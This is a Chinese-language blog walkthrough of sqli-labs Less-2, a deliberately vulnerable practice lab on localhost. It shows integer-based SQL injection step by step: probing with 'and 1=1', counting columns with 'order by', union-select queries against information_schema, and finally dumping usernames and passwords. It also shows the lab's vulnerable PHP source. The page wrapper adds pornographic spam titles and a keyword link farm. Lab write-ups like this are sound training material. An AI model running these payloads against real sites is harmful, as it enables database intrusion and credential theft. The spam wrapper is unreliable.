老熟女激烈的高潮_日韩一级黄色录像_亚洲1区2区3区视频_精品少妇一区二区三区在线播放_国产欧美日产久久_午夜福利精品导航凹凸

咨詢熱線 :
028-86922220

重慶分公司,新征程啟航

為企業(yè)提供網(wǎng)站建設(shè)、域名注冊、服務(wù)器等服務(wù)

sqli-labs-master第二關(guān):ErrorBased-Intiger

接上篇博客:https://blog.51cto.com/tdcqvip/2060816

成都創(chuàng)新互聯(lián)公司:從2013年成立為各行業(yè)開拓出企業(yè)自己的“網(wǎng)站建設(shè)”服務(wù),為近1000家公司企業(yè)提供了專業(yè)的成都做網(wǎng)站、成都網(wǎng)站建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計和網(wǎng)站推廣服務(wù), 按需定制由設(shè)計師親自精心設(shè)計,設(shè)計的效果完全按照客戶的要求,并適當(dāng)?shù)奶岢龊侠淼慕ㄗh,擁有的視覺效果,策劃師分析客戶的同行競爭對手,根據(jù)客戶的實際情況給出合理的網(wǎng)站構(gòu)架,制作客戶同行業(yè)具有領(lǐng)先地位的。

來到第二關(guān):

http://127.0.0.1/sqli-labs-master/Less-2/

sqli-labs-master第二關(guān):Error Based- Intiger

訪問http://127.0.0.1/sqli-labs-master/Less-2/?id=1

sqli-labs-master第二關(guān):Error Based- Intiger

判斷是否有注入點:

and 1 = 1 返回正常

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 1 %23

sqli-labs-master第二關(guān):Error Based- Intiger

and 1 = 2 返回失敗

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 2 %23

sqli-labs-master第二關(guān):Error Based- Intiger

說明存在注入點:

order by  n 查看字段

當(dāng)n=3時返回正確

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3  %23

sqli-labs-master第二關(guān):Error Based- Intiger

當(dāng)=4時返回錯誤

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4  %23

sqli-labs-master第二關(guān):Error Based- Intiger

說明字段是3

用union select 進行聯(lián)合查詢:

并用報錯的方式顯示顯示位:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,3  %23

sqli-labs-master第二關(guān):Error Based- Intiger

通過上圖可以看到顯示位在2,3上。

用version()和database()查看php版本和當(dāng)前網(wǎng)站用的數(shù)據(jù)庫名字

sqli-labs-master第二關(guān):Error Based- Intiger

我們通過上圖可以看到數(shù)據(jù)庫是“security” 版本是5.5.53

接下來我們查看數(shù)據(jù)庫security下的表:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23

sqli-labs-master第二關(guān):Error Based- Intiger

通過上圖可以看到有users表

查看users表里的列

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1  union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23

sqli-labs-master第二關(guān):Error Based- Intiger

接下來就是查看username和password里的內(nèi)容:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1  union select 1,username,password from users where id = 2 %23

sqli-labs-master第二關(guān):Error Based- Intiger

結(jié)束:

聲明:源代碼被我改動了,所以在注入的時候才會顯示出來查詢語句

接下來看看源代碼:





Less-2 **Error Based- Intiger**







Welcome    Dhakkan 




";

	if($row)
	{
  	echo "";
  	echo 'Your Login name:'. $row['username'];
  	echo "
";
  	echo 'Your Password:' .$row['password'];
  	echo "";
  	}
	else 
	{
	echo '';
	print_r(mysql_error());
	echo "";  
	}
}
	else
		{ 	
		echo "Please input the ID as parameter with numeric value";
		}

?>


 



通過源代碼我們可以看到,在連接數(shù)據(jù)庫查詢的時候并沒有進行任何過濾

與第一關(guān)不同的地方就是

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

這句,沒有“''”符號。

利用方式大致相同。

第三關(guān)盡快更新

微信公眾號:

sqli-labs-master第二關(guān):Error Based- Intiger


分享標(biāo)題:sqli-labs-master第二關(guān):ErrorBased-Intiger
文章起源:http://www.xueling.net.cn/article/pjojgo.html

其他資訊

在線咨詢
服務(wù)熱線
服務(wù)熱線:028-86922220
TOP
主站蜘蛛池模板: 蜜芽AV无码精品国产午夜 | 成人www.| 久久久久无码精品国产不卡 | 亚洲一区二区三区在线观看精品中文 | 亚洲人成a在线网站 | 少妇被粗大的猛烈进出 | 亚洲欧美国产网曝综合网 | 99资源在线 | 日本少妇xxxx动漫 | 久久三级视频 | www.波多野结衣.com | 97久久精品人人澡人人爽缅北 | 国产日韩欧美另类 | 欧美激情一区二区三区AA片 | 欧美熟妇一区二区三区蜜桃视频 | 好吊色国产| 狂野欧美性猛交免费视频 | 91精品一本久道久久丁香狠狠躁 | 九色蝌蚪少妇 | 亚洲视频在线观看视频 | 亚洲一本之道高清在线观看 | 人妻系列,一区二区三区 | 98色婷婷在线 | 久久婷婷色综合一区二区 | 国产午夜福利在线机视频 | 最近中文字幕在线视频 | 九一视频免费看 | 真实国产乱子伦对白视频 | 一级黄色片免费观看 | 国产精品亚洲欧美卡通动漫 | gogogo免费视频观看 | 久久九九久久精品 | 色八网站首页 | 成人av影片在线观看 | 欧美丰满大胆少妇xxxooo | 精品国产一区二区AV麻豆不卡 | 日本少妇高潮喷水视频 | 美女mm131爽爽爽作爱 | 免费观看添你到高潮视频 | 国产精品500部 | 国产三级国产经典国产AV |